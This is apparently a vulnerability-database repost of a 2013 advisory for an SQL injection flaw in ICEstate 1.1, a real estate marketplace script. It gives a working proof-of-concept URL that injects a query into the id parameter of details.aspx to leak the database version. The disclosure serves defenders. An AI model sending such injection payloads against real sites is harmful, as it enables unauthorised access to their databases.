ICEstate SQL Injection

2013.01.05

Credit: cr4wl3r

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-89

                                      \#'#/
                                      (-.-)
   ------------------------------oOO---(_)---OOo-----------------------------------
   |        ICEstate (Real Estate Marketplace) SQL Injection Vulnerability        |
   --------------------------------------------------------------------------------
[!] Discovered: cr4wl3r <cr4wl3r[!]linuxmail.org>
[!] Site: http://bastardlabs.info
[!] Download: http://icloudcenter.com/real-estate-marketplace-site.htm
[!] Price: $55.99
[!] Version: 1.1
[!] Date: 2013-01-04
[!] Remote: yes
[!] Tested: Ubuntu
[!] Reference: http://bastardlabs.info/exploits/ICEstate.txt
[!] Poc: 
[!] http://bastardlabs/icestatemarket/details.aspx?id=convert(int,(select+@@version));--
[!] Thanks to Hawke for nice song http://goo.gl/TLkEs :)

References:

http://icloudcenter.com/real-estate-marketplace-site.htm

http://bastardlabs.info

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

ICEstate SQL Injection

References:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.